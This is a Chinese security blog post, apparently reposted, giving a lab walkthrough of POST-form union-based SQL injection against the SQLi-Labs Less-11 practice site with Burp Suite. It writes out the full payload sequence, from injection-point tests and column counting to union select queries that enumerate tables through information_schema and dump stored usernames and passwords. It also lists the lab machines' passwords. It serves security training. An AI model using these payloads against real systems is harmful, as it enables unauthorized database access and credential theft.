2026-05-18 05:32:04 网络安全文章来源：ZONE.CI 全球网 0 阅读模式

文章总结： 本文详细介绍了基于联合查询的POST型SQL注入攻击实验，通过SQLi-Labs网站的Less-11漏洞环境演示了完整攻击流程。实验使用Burpsuite工具拦截POST请求，通过判断注入点类型、确定字段数、定位回显位置，逐步获取数据库名、表名和用户凭证信息。文档提供了具体的payload示例和操作步骤，强调仅限授权测试使用。 综合评分： 82 文章分类： WEB安全,渗透测试,实战经验,漏洞分析

cover_image

SQL注入的方法0x001

原创

建哥聊安全建哥聊安全

建哥聊安全

2026年5月17日 10:27 湖南

在小说阅读器读本章

去阅读

免责声明：严格禁止对任何未授权系统/网络进行扫描、攻击或入侵。禁止制作/传播恶意程序，禁止参与任何网络犯罪。如擅自将本文实验技术用于非法用途，一切法律后果及责任由行为人独立承担，与作者无关。

SQL注入-基于联合查询的POST注入

实验目的

理解POST注入的原理和特点，掌握利用联合查询（union select）的方法实现SQL注入的基本流程。

实验环境

攻击机：Pentest-Atk

（1）操作系统：Windows 10

（2）安装的应用软件：Sqlmap、Burpsuite、FireFox浏览器插件Hackbar、FoxyProxy等

（3）登录账号密码：操作系统账号Administrator，密码Sangfor!7890

靶机：A-SQLi-Labs

（1）操作系统：CentOS 7

（2）安装的应用软件：Apache、MySQL(MariaDB)、PHP；DVWA、SQLi-Labs、Webug3.0漏洞网站环境

（3）登录账号密码：操作系统账号root，密码Sangfor!7890

实验原理

POST注入，其注入点存在于POST表单中的参数处。攻击者可以通过代理抓包工具（如Burpsuite）拦截并修改POST表单中的参数，利用union select命令进行注入，暴露数据库中存储的信息。

实验步骤

本实验的目标是：以SQLi-Labs网站的Less-11为入口，利用联合查询（union select）的方式实施SQL注入，获取SQLi-Labs网站的登录用户名和密码。

1．访问SQLi-Labs网站

在攻击机Pentest-Atk打开FireFox浏览器，并访问靶机A-SQLi-Labs上的SQLi-Labs网站Less-11。访问的URL为：

http://[靶机IP]/sqli-labs/Less-11/

(注意大小写)

2．利用Burpsuite工具抓包

（1）启动Burpsuite

在攻击机Pentest-Atk的桌面文件夹Burp中，鼠标左键双击BURP.cmd程序，启动Burpsuite。

（2）设置Burpsuite的代理服务端口

在Burpsuite软件界面上选择选项卡“Proxy”->“Options”，在Proxy Listeners模块下，将Burpsuite的代理服务端口设置为8080（此为Burpsuite默认的服务端口）。

（3）开启Burpsuite的代理拦截功能

在Burpsuite软件界面上选择选项卡“Proxy”->“Intercept”，将拦截开关按钮的状态设置为“Intercept is on”。

注意：上述设置完成之后，不要关闭Burpsuite！

（4）设置Firefox代理

回到FireFox浏览器界面，鼠标右键单击浏览器地址栏右方的FoxyProxy插件图标按钮，在弹出的菜单中选择“为全部URLs启用代理服务器127.0.0.1:8080”:

代理设置成功后，FoxyProxy插件图标会变成蓝色。

（5）利用Burpsuite工具拦截HTTP请求包

在FireFox浏览器访问的Less-11登录验证界面，输入用户名admin、密码任意（本例中为1），然后点击Submit按钮，

此时Burpsuite会拦截到HTTP请求包：

（6）将Burpsuite工具拦截到的HTTP请求包发送至Repeater模块。

选中拦截到的HTTP请求包全部内容，单击鼠标右键，在弹出的菜单中选择“Send to Repeater”，将其发送给Burpsuite的Repeater模块。

发送成功后，在Burpsuite的Repeater选项卡下能够看到刚刚拦截的HTTP请求包内容。

后续的步骤中，可以在Repeater选项卡下的Request栏中设置注入的payload，设置完成后点击Send按钮发送，并在Response栏中观察目标服务器的响应。

3．寻找注入点

在POST表单处，分别使用以下2条payload寻找注入点及判断注入点的类型：

uname=admin’&passwd=1&submit=Submit

报错！

uname=admin’#&passwd=1&submit=Submit

目标正常回显用户名和密码！

由此可以判断，目标网站在POST参数处存在字符型注入点。

4．判断网站查询的字段数

尝试使用以下payload获取网站查询的字段数（关键字order by）：

uname=admin’ order by 1#&passwd=1&submit=Submit

目标正常回显用户名和密码！

uname=admin’ order by 2#&passwd=1&submit=Submit

目标正常回显用户名和密码！

uname=admin’ order by 3#&passwd=1&submit=Submit

报错！

由此可以判断，网站查询的字段数为2。

5．判断网站的回显位置

利用以下payload判断网站的回显位置：

uname=admin’ and 1=2 union select 1,2#&passwd=1&submit=Submit

运行结果，1号位和2号位均可以回显！

6．获取网站当前所在数据库的库名

利用以下payload获取网站当前所在数据库的库名：

uname=admin’ and 1=2 union select 1,database()#&passwd=1&submit=Submit

显示结果为security。

7．获取数据库security的全部表名

使用以下payload获取数据库security的全部表名：

uname=admin’ and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=’security’#&passwd=1&submit=Submit

显示结果中，有一个名为users的表，这当中可能存放着网站用户的基本信息。

8．获取users表的全部字段名

使用以下payload获取users表的全部字段名：

uname=admin’ and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_schema=’security’ and table_name=’users’#&passwd=1&submit=Submit

显示结果，users表中有id、username和password三个字段。

9．获取users表id、username和password字段的全部值。

由于users表中存放着多组用户名和密码的数据，而每次只能显示一组数据，我们可以通过limit M,N的方式逐条显示，如

（1）显示第1组数据

uname=admin’ and 1=2 union select 1,concat_ws(‘,’,id,username,password) from security.users limit 0,1#&passwd=1&submit=Submit

显示结果为Dump，Dump。

（2）显示第2组数据

uname=admin’ and 1=2 union select 1,concat_ws(‘,’,id,username,password) from security.users limit 1,1#&passwd=1&submit=Submit

显示结果为Angelina，I-kill-you。

（3）显示第3组数据

uname=admin’ and 1=2 union select 1,concat_ws(‘,’,id,username,password) from security.users limit 2,1#&passwd=1&submit=Submit

显示结果为Dummy，p@ssword。

…

以此类推，可通过修改limit后面的参数，将users表中存放的所有用户信息全部暴露出来。实验至此结束。

实验总结

本次实验，成功实现了对存在POST注入点的网站的手工SQL注入，掌握了基于联合查询的注入方法和流程。

更多学习资料点击头像关注公众号，后台私信回复666即可领取视频学习资料，赶紧来领取吧！！！

往期精选：

万丈高楼平地起，SQL数据库得学习。

会它了，Web目录扫描一把梭？

这款插件能隐藏或伪装客户端浏览器信息？

黑客万能工具包

你的电脑密码就这样被暴力破解了？

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：建哥聊安全建哥聊安全建哥聊安全《SQL注入的方法0x001》